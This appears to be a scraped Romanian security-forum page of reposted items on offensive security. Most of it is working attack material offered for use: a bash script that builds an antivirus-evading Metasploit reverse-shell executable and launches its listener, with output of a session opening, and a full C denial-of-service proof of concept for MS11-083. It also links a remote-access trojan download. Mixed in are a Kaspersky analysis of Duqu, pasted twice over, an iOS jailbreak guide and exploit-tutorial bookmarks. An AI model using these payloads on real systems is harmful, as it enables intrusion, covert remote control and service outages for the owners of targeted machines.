Nytro

FUD Payload Generator for Backtrack Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works: #!/bin/bash echo "************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo " By Astr0baby 2011 " echo " With some Randomic gravy and sauce to bypass Antivirus " echo " For Automatic Teensy programming and deployment " echo "************************************************************" rm -rf ShellCode echo "Here is a network device list available on yor machine" cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d' echo -e "What network interface are we gonna use ? \c" read interface echo -e "What Port Number are we gonna listen to? : \c" read port echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c" read seed echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c" read enumber # Get OS name OS=`uname` IO="" # store IP case $OS in Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;; *) IP="Unknown";; esac #echo "$IP" ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c mkdir ShellCode mv test.c ShellCode cd ShellCode #Replacing plus signs at the end of line sed -e 's/+/ /g' test.c > clean.c sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c echo "#include <stdio.h>" >> temp echo 'unsigned char ufs[]=' >> temp for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2 sed -i 's/$/"/' temp2 sed -i 's/^/"/' temp2 echo ';' >> temp2 cat temp2 >> temp cat ready.c >> temp mv temp ready2.c echo ";" >> ready2.c echo "int main(void) { ((void ())micro)();}" >> ready2.c mv ready2.c final.c echo 'unsigned char tap[]=' > temp3 for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4 sed -i 's/$/"/' temp4 sed -i 's/^/"/' temp4 echo ';' >> temp4 cat temp4 >> temp3 cat temp3 >> final.c #Cleanup rm -f clean.c rm -f test.c rm -f ready.c rm -f rand.c rm -f temp2 rm -f temp3 rm -f temp4 /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1 mv final.exe $RANDOM.exe filex=`ls -ct1 | head -1` sumx=`sha1sum $filex` echo $filex "...generated in ShellCode subfolder" echo $filex "sha1checksum is .." $sumx strip --strip-debug $filex cd .. echo " starting the meterpreter listener..." sleep 2 ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E In order to be able to compile the generated payload we must install the following packages: root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils After the installation we must move our shell-script to default metasploit’s folder (/pentest/exploits/framework) and execute it: root@bt:/pentest/exploits/framework# chmod +x fud.sh root@bt:/pentest/exploits/framework# ./fud.sh ************************************************************ Automatic shellcode generator - FOR METASPLOIT By Astr0baby 2011 With some Randomic gravy and sauce to bypass Antivirus For Automatic Teensy programming and deployment ************************************************************ Here is a network device list available on yor machine lo: eth0: What network interface are we gonna use ? eth0 What Port Number are we gonna listen to? : 443 Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000 And lastly how many times do we want to encode our payloads 1-20? : 5 [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) [*] x86/jmp_call_additive succeeded with size 457 (iteration=1) [*] x86/jmp_call_additive succeeded with size 489 (iteration=2) [*] x86/jmp_call_additive succeeded with size 521 (iteration=3) [*] x86/jmp_call_additive succeeded with size 553 (iteration=4) [*] x86/jmp_call_additive succeeded with size 585 (iteration=5) [*] x86/call4_dword_xor succeeded with size 614 (iteration=1) [*] x86/call4_dword_xor succeeded with size 642 (iteration=2) [*] x86/call4_dword_xor succeeded with size 670 (iteration=3) [*] x86/call4_dword_xor succeeded with size 698 (iteration=4) [*] x86/call4_dword_xor succeeded with size 726 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 753 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 780 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 807 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 834 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 861 (iteration=5) 20210.exe ...generated in ShellCode subfolder 20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe starting the meterpreter listener... Since we have created our payload we will try to check if it works: root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe fixme:system:SetProcessDPIAware stub! fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil) fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil) wine: configuration in '/root/.wine' has been updated. fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot fixme:toolhelp:Heap32ListFirst : stub PAYLOAD => windows/meterpreter/reverse_tcp LHOST => 192.168.200.22 LPORT => 443 AutoRunScript => migrate2 explorer.exe [*] Started reverse handler on 192.168.200.22:443 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.200.22 [*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200 meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 12 services.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\services.exe 17 explorer.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\explorer.exe 33 winedevice.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\winedevice.exe 8 24382.exe x86 0 NT AUTHORITY\INTERACTIVE Z:\pentest\exploits\framework\ShellCode\24382.exe meterpreter > sysinfo Computer : bt OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 Now our payload is fully undetectable from most of antivirus engines. Of course we can try to scan it using online services such as novirusthanks: Credits go to Astr0baby Sursa: http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/

SQL Injection basics Authors: Xhabie-Crew Sql Injection With Sqlmap http://www.securitytube.net/video/2435 Sql Injection (Step By Step) http://www.securitytube.net/video/2438 Bypass Login With Sql Injection http://www.securitytube.net/video/2439 Atentie, nu sunt tutoriale din care "invatati" ceva, sunt pur demonstrative. Adica NU asa invatati SQL Injection.

The Duqu Saga Continues: Enter Mr. B. Jason and TV’s Dexter Aleks Kaspersky Lab Expert Posted November 11, 12:09 GMT As we informed you earlier, we’ve recently been conducting an investigation into a number of incidents in connection with a Duqu trojan infection. Thankfully we’ve been able to make some headway in getting to the bottom of Duqu and putting together several of the previously absent components without which it has been difficult to understand what’s actually been going on. First things first, we would like to express our sincere thanks to the specialists at CERT Sudan. They’ve been providing us with priceless assistance in our investigation, and showed the utmost professionalism - in full accordance with the values and aims of any CERT around the world. Our cooperation with the Sudanese CERT is ongoing and will cover another three incidents found in the country. Our main achievement has been in the investigation of the incident deemed No.#1, described in my second post about Duqu. We managed to not only locate all the previously undiscovered files of this variant of Duqu, but also to find both the source of the infection and the file dropper that contains the vulnerability exploit in win32k.sys (CVE-2011-3402). Comparing the data we uncovered with that obtained by other researchers and antivirus companies, we’ve elicited various common traits that have revealed the approximate timeline and overall methods used by Duqu’s authors. The dates of the incident correlate with the history of discovery in Iran of a virus called Stars. At that time Iranian specialists didn’t share samples of the discovered virus with any of the anti-virus companies, and this, it has to be said, was a serious mistake, which gave rise to all subsequent events in this saga. Most probably, the Iranians found a keylogger module that had been loaded onto a system and which contained a photo of the NGC 6745 galaxy. This could explain the title Stars given to it. It’s possible that the Iranian specialists found just the keylogger, while the main Duqu module and the dropper (including the documents that contained the then-unknown vulnerability) may have gone undetected. Stage 1: Penetration, E-mail The attack took place on a pre-selected target. For obvious reasons, we can’t reveal the name of the company that was targeted in incident No.#1,. Like with the incident investigated by CrySyS Lab, the attack was launched via e-mail. The object was attacked twice - on April 17 and 21, 2011. The first attempt turned out to be unsuccessful (the e-mail from the attackers wound up in the junk folder), after which they repeated the attack four days later, amending the subject line of the e-mail slightly. Mr. B. Jason sure was dedicated and persistent. It wasn’t a mass spam mail-out, since both the subject and the name of the file mentioned the attacked company specifically. Both times the e-mail was sent from one and the same IP-address, based in Seoul, South Korea. We reckon that this computer was infected earlier by some kind of malicious program and was used unknowingly (to its owner) as a proxy. The second attack turned out successful: the addressee opened the attached DOC file that contained the vulnerability exploit and Trojan installer. The attackers used an interesting ruse at this stage. After the addressee opened the file the exploit started its work: it became active, residing in the memory, but did nothing! Meanwhile, both the original file and Word itself could have been closed. This period of inactivity lasted around ten minutes, after which the exploit waited for the user’s activity to stop (no keyboard or mouse activity). Only then did the dropper kick into action. The variant of the dropper that we found differs somewhat from the dropper found by the Hungarian laboratory Crysys and described by Symantec. However, these differences relate mainly to sizes and dates of creation of the component upon a tiny change to the code. The overall arrangement at this stage looked like this: Exploit -> kernel -> driver in kernel -> loader dll in services.exe -> big pnf in services.exe -> big pnf installing from lsass or AV process. The shellcode of the exploit was contained in an embedded font processed by the win32k.sys system. The font was called Dexter Regular, and its creators were shown as Showtime Inc. The Duqu Saga Continues: Enter Mr. B. Jason and TV’s Dexter Aleks Kaspersky Lab Expert Posted November 11, 12:09 GMT Tags: Duqu, Microsoft Word, Targeted Attacks, Vulnerabilities and exploits, Zero-day vulnerabilities, Stuxnet 0.5 As we informed you earlier, we’ve recently been conducting an investigation into a number of incidents in connection with a Duqu trojan infection. Thankfully we’ve been able to make some headway in getting to the bottom of Duqu and putting together several of the previously absent components without which it has been difficult to understand what’s actually been going on. First things first, we would like to express our sincere thanks to the specialists at CERT Sudan. They’ve been providing us with priceless assistance in our investigation, and showed the utmost professionalism - in full accordance with the values and aims of any CERT around the world. Our cooperation with the Sudanese CERT is ongoing and will cover another three incidents found in the country. Our main achievement has been in the investigation of the incident deemed No.#1, described in my second post about Duqu. We managed to not only locate all the previously undiscovered files of this variant of Duqu, but also to find both the source of the infection and the file dropper that contains the vulnerability exploit in win32k.sys (CVE-2011-3402). Comparing the data we uncovered with that obtained by other researchers and antivirus companies, we’ve elicited various common traits that have revealed the approximate timeline and overall methods used by Duqu’s authors. The dates of the incident correlate with the history of discovery in Iran of a virus called Stars. At that time Iranian specialists didn’t share samples of the discovered virus with any of the anti-virus companies, and this, it has to be said, was a serious mistake, which gave rise to all subsequent events in this saga. Most probably, the Iranians found a keylogger module that had been loaded onto a system and which contained a photo of the NGC 6745 galaxy. This could explain the title Stars given to it. It’s possible that the Iranian specialists found just the keylogger, while the main Duqu module and the dropper (including the documents that contained the then-unknown vulnerability) may have gone undetected. Stage 1: Penetration, E-mail The attack took place on a pre-selected target. For obvious reasons, we can’t reveal the name of the company that was targeted in incident No.#1,. Like with the incident investigated by CrySyS Lab, the attack was launched via e-mail. The object was attacked twice - on April 17 and 21, 2011. The first attempt turned out to be unsuccessful (the e-mail from the attackers wound up in the junk folder), after which they repeated the attack four days later, amending the subject line of the e-mail slightly. Mr. B. Jason sure was dedicated and persistent. It wasn’t a mass spam mail-out, since both the subject and the name of the file mentioned the attacked company specifically. Both times the e-mail was sent from one and the same IP-address, based in Seoul, South Korea. We reckon that this computer was infected earlier by some kind of malicious program and was used unknowingly (to its owner) as a proxy. The second attack turned out successful: the addressee opened the attached DOC file that contained the vulnerability exploit and Trojan installer. The attackers used an interesting ruse at this stage. After the addressee opened the file the exploit started its work: it became active, residing in the memory, but did nothing! Meanwhile, both the original file and Word itself could have been closed. This period of inactivity lasted around ten minutes, after which the exploit waited for the user’s activity to stop (no keyboard or mouse activity). Only then did the dropper kick into action. The variant of the dropper that we found differs somewhat from the dropper found by the Hungarian laboratory Crysys and described by Symantec. However, these differences relate mainly to sizes and dates of creation of the component upon a tiny change to the code. The overall arrangement at this stage looked like this: Exploit -> kernel -> driver in kernel -> loader dll in services.exe -> big pnf in services.exe -> big pnf installing from lsass or AV process. The shellcode of the exploit was contained in an embedded font processed by the win32k.sys system. The font was called Dexter Regular, and its creators were shown as Showtime Inc. This is another prank pulled by the Duqu authors, since Showtime Inc. is the cable broadcasting company behind the TV series Dexter, about a CSI doctor who happens also to be a serial killer who avenges criminals in some post-modern perversion of Charles Bronson’s character in Death Wish. The driver loaded by the exploit into the kernel of the system had a compilation date of August 31, 2007. The analogous driver found in the dropper from CrySyS was dated February 21, 2008. If this information is correct, then the authors of Duqu must have been working on this project for over four years! The driver loaded in the services.exe process a library, which was also located in the body of the exploit – the main module of the dropper – and ran its code. At this stage the dropper attempts to check in the registry the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\"CF1D" It should be noted that in the document published by Symantec a CFID key is mentioned; however, this may be a typo. The dropper retrieves from its body the contents of the “.init” section in which there is a header with the magical identifier CIGH, plus extra settings, a PNF (.DLL), and a driver which gets installed on the system. After unpacking the contents of the section, a test is carried out for correspondence of the current date with the range installed in the heading of the “.init” section of the dropper. If the date doesn’t fall within that range, the Trojan is not installed. In our variant, this range was from August 17, 2010 to July 18, 2012. In the sample of the dropper found by CrySyS the range was different: August 17, 2005 to November 2, 2023. Next, the dropper loads the PNF (DLL) part and transfers control to the function exported as No.4. This function is responsible for the installation onto the system and the launch of the driver of the Trojan and encrypted library (PNF DLL), together with the configuration file. The configuration file contains the date of infection and the period of work of the Trojan in the system (by default - 30 days, but this period could change depending on commands from the control center). In this incident, as we assumed earlier, a unique set of files was used, which is different from earlier-known sets. The most important difference is that the main module of the Trojan (the PNF DLL file) had a creation date of April 17 - the same day as the first attack on the victim. This fact shows that the authors build a separate set of files for each specific victim, and do so right before the attack. The files we discovered amount to the following collection: Driver Size Date Main DLL Size Date Config adp55xx.sys 24960 03.11.2010 apd95xx.pnf 248320 17.04.2011 adp96xx.pnf The differences in size of the main DLL (they were found on different computers in one incident) are explained by the fact that, in the first variant of the DLL, the component interacting with the control center is stored in the PNF DLL as a resource numbered 302; and in the second variant this component is included in the compressed “.zdata” section of a loader library that is stored as resource 302. We assume that the compression took place upon forming the set for attacking a different computer on the network. The control server (C2) used in this set also differed from previously discovered ones in India and Belgium. In this incident the control center was situated in another country; however, we cannot publically announce the data due to the ongoing nature of the investigation. Besides, we know of yet another control center used in a different incident; it too is currently being analyzed. This information shall be published shortly. This also seems to indicate that the attackers have used a separate C&C for each unique attack. Stage II: Collecting Info During our investigation of the incident it was established that two computers were compromised in one organization. The first of them was the source of infection from April 21; the second was compromised later, at the end of May. The infection of the second computer occurred via the local network. After infection of the system and establishing the link with the control server, it is clear that an extra module known as a keylogger was loaded and installed, which was able to collect information about the system, take screenshots, search for files, capture passwords, etc. To date, the existence of at least two variants of the given module has been confirmed - that found by Crysys Lab (compilation date June 1, 2011) and that found by Symantec (compilation date August 10, 2011). We haven’t been able to find a similar module in the given incident; however, we can announce that it existed as far back as in May 2011. On both computers were found traces of the operation of a spy module, i.e., files named ~DFxxxxx.tmp (e.g., ~DF1EF83.tmp) and ~DQx.tmp (e.g., ~DQ2C6.tmp). The name format of the file ~DF[five hex digit] differs from the names of the temporary files created by MS Word, which use the format ~DF[four hex digit]. ~DF files contain a compressed identifier of the infected system and start with the line ABh91AY&SY. ~DQ files contain gathered information (lists of processes, screenshots, info about applications). These files are also compressed and contain a similar marker, differing by just one symbol: AEh91AY&SY. At present we do not know what module creates the ~DF files (the ~DQ files are created by the known spy module), or what their precise target is. On the first computer these files were dated April 27 - three days after the date of infection. On May 25, 2011, the spy module created the file ~DQ181.tmp In it is contained information about the network neighborhood of the initially infected computer. On the next day, May 26, 2011, infection of the second computer in the network was recorded. On it was created the file identifier ~DF. What is interesting here is the fact that later on the second computer was created yet another ~DF file. This occurred on June 2, 2011. This date coincides with the date of compilation of the known spy module (June 1, 2011). It is possible that in this period of June 1-2 the authors of Duqu installed this new version of the module on all the infected computers via the C&C server. Traces of the work of this module are visible in the existence of file ~DQ4.tmp, created on June 29. We found three ~DQ-type files, created on May 25, June 29 and August 24. We noticed that all three dates are Wednesdays. This could be just a coincidence, maybe not. Still, based on this ‘coincidence’ it is possible to name the group behind Duqu as the Wednesday’s Gang The Trojan was present in the infection of systems from April 21 right up to the end of October 2011. Its configuration files were installed over at least a minimum of 121 days; the reinstallation of the main module occurred back at the end of June 2011. During all this time the attackers periodically installed new modules, infected other computers on the network, and collected information. Conclusion As part of the investigation of the given incident we’ve established the entry points for penetration of the systems, dates of events, and several facts regarding the conduct of the attackers. This information allows one to date one of the waves of attack to mid-to-late April 2011. Key findings include: - For every victim, a separate set of attack files was created; - Each unique set of files used a separate control server; - The attacks were conducted via e-mails with a .DOC file attached; - The mail-outs took place from anonymous mailboxes, probably via compromised computers; - At least one e-mail address is known from which the mail-outs were conducted -bjason1xxxx@xxxx.com; - For each victim, a separate DOC file was put together; - The vulnerability exploit was contained in the font called “Dexter Regular”; - The attackers changed the shellcode, and varied the range of dates for possible infection; - After penetration into a system the attackers installed extra modules and infected neighboring computers; - The presence on the systems of the files ~DF.tmp and ~DQ.tmp unambiguously points to an infection by Duqu. Due to privacy reasons and protection of the identity of the victim, we cannot share the source .DOC file with other parties. Also, we are not at present disclosing the address of the control server for this variant of Duqu; however, we think that it is not functioning now and all critical information on it has already been deleted by the attackers. This is also the case for one more control server we have discovered. Information about the control servers will be published later. We can say that there are at least 12 unique sets of Duqu files known to us at present. The variant discussed in this post has been named variant F. Detailed information on the other variants will be published later. Sursa: http://www.securelist.com/en/blog/208193243/The_Duqu_Saga_Continues_Enter_Mr_B_Jason_and_TVs_Dexter

The Grace Programming Language Project SPLASH 2011: Andrew Black and James Noble - The Grace Programming Language Project Video: http://channel9.msdn.com/Blogs/Charles/SPLASH-2011-Andrew-Black-and-James-Noble-The-Grace-Programming-Language-Project The Grace Programming Language project is a research effort that aims to make learning how to program easier by baking "educational abstractions" into the language itself - it's an object oriented programming language designed for teaching undergraduate students. This means the language is designed from the ground up as a learning tool for novice adult programmers. The Grace PL project is led by Kim Bruce, Andrew Black, and James Noble. (Unfortunately, Kim was unable to take part in this conversation. Next time, Kim!) Here, we learn about the need for a programming language that targets novices and what a novice programming language looks like. What does a programming language for novices mean, exactly? How can it be simple enough (conceptually easy to use, to read, to understand) while remaining useful as a programming tool? Can't you learn how to program effectively using objects in an industrial strength general purpose programming language like C# or Java? What does Grace afford that the more feature-rich languages don't? Tune in. This is a fascinating research topic and one that should yield some very interesting practical results. Great work! Website: http://gracelang.org/ Specificatii: http://gracelang.org/documents/grace-spec0132.pdf

How to Jailbreak iPhone iOS 5 Posted on November 11, 2011 by Carole Wozny Now that iOS 5.0.1 is available for download, we knew it was only a matter of days before a Jailbreak would be available for the new iOS. And we didn’t have long to wait. A tethered jailbreak version of RedSn0w 0.9.9b8. Is now available for download. For those of you who wish to wait for an untethered jailbreak, keep in mind that the jailbreak may not be available in the near future. Keep in mind that once you jailbreak your iPhone from iOS5, you may have no way of downgrading your iOS back to an earlier version so make sure to backup everything on your iPhone first before you jailbreak it. How to Jailbreak iOS 5.0.1 Note: You will need iOS 5.0 firmware (download here) to jailbreak with RedSn0w 0.9.9b8. Step 1: Install 5.0.1 Final. Step 2: Open RedSn0w 0.9.9b8 (download here) and select Extras > Specify Firmware > then point it to the iOS 5.0 firmware IPSW. Step 3: Go back to the main screen of RedSn0w and place your device into DFU mode. Click Jailbreak, and then select Install Cydia. Step 4: Your device should then jailbreak, but note that your Cydia icon will be white because it is a tethered jailbreak. To boot tethered you will need to place your device into DFU mode again. Step 5: From the main RedSn0w page, select Extras > Specify Firmware > and point it to the iOS 5.0 IPSW. Step 6: Choose "Just Boot" from RedSn0w’s Extras menu, and it will perform a tethered boot. iOS 5.0.1 Final should now be fully jailbroken. If you’re in need of a more in-depth RedSn0w guide, venture over to the RedSn0w page. Here is an excellent video tutorial from the idownloadblog.com site: Video: http://www.youtube.com/watch?v=L1d1sYJcQK8 Sursa: http://koresecure.com/2011/11/11/how-to-jailbreak-iphone-ios-5/

Steganography or encryption in bankers? Dmitry Bestuzhev Kaspersky Lab Expert Posted November 10, 10:34 GMT While looking over some potentially malicious links from Brazil, I came across an interesting group of files. They were of varying sizes but had similar structures. First I thought this was some type of steganography. The files has a jpeg extension, but were in fact bmp files in structure. It was evident that they contained encrypted malware and some additional data. After further analysis, I discovered that this was a block cipher. As far as I know, this is the first time it has been used by malware writers anywhere in Latin America. This is what the malicious program looked like after decryption: By using this technique, the virus creators kill several birds with one stone. Firstly, it may cause automatic malware analysis systems to function incorrectly: the file would be downloaded and analyzed by the antivirus program, and given the all-clear; with time the link will be exempted from checks altogether. Secondly, the administrators of the sites where such encrypted malicious files are hosted won’t be able to identify them as malicious and will leave them as they are. Thirdly, some malware researchers may not have the time or necessary expertise to deal with them. All of this plays into the hands of the cybercriminals. We have observed that the virus writers behind this specific attack publish new mirrors with the files and new malware every 2 days or so. So far, the encryption algorithm has been the same, but I’m sure it will be changed after this post is published. This is the decryption script for the current status: Sursa: http://www.securelist.com/en/blog/208193235/Steganography_or_encryption_in_bankers Da, gandita treaba...

Demonio RAT Site: Demonio - Browse Files at SourceForge.net Download: http://sourceforge.net/projects/demonio/ http://sourceforge.net/projects/demonio/files/

MS11-083 PoC winnuke2011.sh * ======================== * This attempts to trigger the ICMP refCount overflow * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This * requires sending 2^32 UDP packets to a host on a closed * port, or 4,294,967,296 packets. A dereference function * must be called that is not triggered via UDP but ICMP * echo packets. This exploit creates 250 threads and * floods a host with UDP packets and then attempts to * trigger the de-ref using ping. I calculated that it * would take approximately 52 days for the host to * enter a condition where this vulnerability is * triggerable. * ======================== #!/bin/sh cat >> winnuke2011.c << EOF /* * MS11-083 DoS/PoC exploit * ======================== * This attempts to trigger the ICMP refCount overflow * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This * requires sending 2^32 UDP packets to a host on a closed * port, or 4,294,967,296 packets. A dereference function * must be called that is not triggered via UDP but ICMP * echo packets. This exploit creates 250 threads and * floods a host with UDP packets and then attempts to * trigger the de-ref using ping. I calculated that it * would take approximately 52 days for the host to * enter a condition where this vulnerability is * triggerable. * * -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> #include <string.h> #include <sys/time.h> int port; int active = 0; pthread_mutex_t mutexactive; void *sendpackets(void *ptr); int main(int argc, char *argv[]) { pthread_t thread; int iret,lthreads; pid_t pid; printf("[+] MS11-083 DoS/PoC exploit\n"); if(argc<3){ printf("[!] Usage : %s <server> <port>\n", argv[0]); exit(1); } char *const args[] = {"ping",argv[1],NULL}; char *const envp[] = {"",NULL}; port = atoi(argv[2]); for(lthreads=0;lthreads<250;lthreads++){//UDP flood iret = pthread_create(&thread,NULL,sendpackets,argv[1]); printf("[-] Thread number %d started\n",lthreads); sleep(1); } printf("[-] One does not simply barrel roll into Mordor\n"); pid = fork(); if(pid==0){// trigger deref. execve("./ping.sh",args,envp); }; while(active){ } printf("[-] You are finished. Patience is a virtue.\n"); exit(0); } void *sendpackets(void *ptr) { int sd, rc, n, echoLen, flags, error, timeOut; unsigned long i; struct sockaddr_in remoteServAddr; struct hostent *h; char str[41]; pthread_mutex_lock(&mutexactive); active++; pthread_mutex_unlock(&mutexactive); srand(time(NULL)); for (i = 0;i < 40;++i){ str[i] = (char)((rand() % 78) + 30); } str[40] = '\0'; // yes this was off-by-one. printf("[-] Sending payload '%s'\n",str); h = gethostbyname(ptr); if(h==NULL) { printf("unknown host '%s' \n",(char*)ptr); exit(1); } remoteServAddr.sin_family = h->h_addrtype; memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length); remoteServAddr.sin_port = htons(port); sd = socket(AF_INET,SOCK_DGRAM,0); if(sd<0){ printf("[!] Cannot open socket\n"); pthread_exit((void*)0); } flags = 0; for(i=0;i<4294967295;i++){ rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr)); if(rc<0){ printf("[!] Cannot send data\n"); close(sd); pthread_exit((void*)0); } } pthread_mutex_lock(&mutexactive); active--; pthread_mutex_unlock(&mutexactive); pthread_exit(NULL); } EOF cat >> ping.sh << EOF #!/bin/sh while \`true\`;do /sbin/ping -c 1 \$1;done EOF chmod +x ping.sh gcc winnuke2011.c -o winnuke2011 ./winnuke2011 Sursa: [C] MS11-083 PoC winnuke2011.sh - Pastebin.com

Am decis, din moment ce majoritatea membrilor probabil au un cont de Facebook, sa cream o pagina de Facebook unde se vor posta atat informatii generale despre RST, informatii de ordin administrativ, cat si informatii de actualitate din domeniul IT, in special informatii legate de hacking, securitate IT si programare, practic legaturi catre topicuri de aici sau legaturi externe. Pagina: https://www.facebook.com/pages/Romanian-Security-Team/163592527017735 Sau mai scurt: http://www.facebook.com/rstforum

Blogs, Feeds, Guides & Links I was cleaning out my bookmarks, de-cluttering twitter favourites and closing a few tabs. Re-saw a few 'hidden gems' as well as repeating finding links for people, so I thought I would try and 'dump' them all in one place. These are roughly sorted, if you're wanting something better - I highly recommend having a look at the pentest-bookmarks. Programming/Coding [bash] Advanced Bash-Scripting Guide - http://tldp.org/LDP/abs/html/ [bash] Bash shell scripting tutorial - http://steve-parker.org/sh/sh.shtml [bash] Bourne Shell Reference - http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/ [CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby - http://hyperpolyglot.org/scripting Offensive Security's Pentesting With BackTrack (PWB) Course [Pre-course] Corelan Team - http://www.corelan.be [Pre-course] The Penetration Testing Execution Standard - http://www.pentest-standard.org/index.php/Main_Page [Hash] NTLM Decrypter - http://www.md5decrypter.co.uk/ntlm-decrypt.aspx [Hash] reverse hash search and calculator - http://goog.li http://security.crudtastic.com/?p=213 Tunnelling / Pivoting [Linux] SSH gymnastics with proxychains - http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html [Windows] Nessus Through SOCKS Through Meterpreter - http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php WarGames / Online Challenges [WarGames] Title - http://securityoverride.com [WarGames] Title - http://intruded.net [Challenge] The Ksplice Pointer Challenge - http://blogs.oracle.com/ksplice/ [WarGames] Title - http://spotthevuln.com [WarGames] Title - http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html [WarGames] Title - http://ftp.hackerdom.ru/ctf-images/ Exploit Development (Programs) [Download] Title - http://www.oldapps.com/ [Download] Title - http://www.oldversion.com/ [Download] Title - http://www.exploit-db.com/webapps/ Misc [RSS] Open Penetration Testing Bookmarks Collection - https://code.google.com/p/pentest-bookmarks/downloads/list [ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses - http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html [DIY] Repair a Broken Ethernet Plug - http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/ [Desktop] Ubuntu Security - http://ubuntuforums.org/showthread.php?t=510812 [TechHumor] Title - https://www.xkcd.com [TechHumor] Title - http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf Exploit Development [Guides] Corelan Team - http://www.corelan.be [Guide] From 0x90 to 0x4c454554, a journey into exploitation. - http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html [Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities - http://resources.infosecinstitute.com/intro-to-fuzzing/ TiGa's Video Tutorial Series on IDA Pro - http://www.woodmann.com/TiGa/idaseries.html [Guide] Advanced Windows Buffer Overflows - http://labs.snort.org/awbo/ [Guide] Stack Based Windows Buffer Overflow Tutorial - http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt [Guide] SEH Stack Based Windows Buffer Overflow Tutorial - http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html [Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation - http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html [Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< - http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html [Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump - http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html [Linux] Linux exploit development part 1 – Stack overflow. - http://sickness.tor.hu/?p=363 [Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg - http://sickness.tor.hu/?p=365 [Linux] Linux exploit development part 3 – ret2libc - 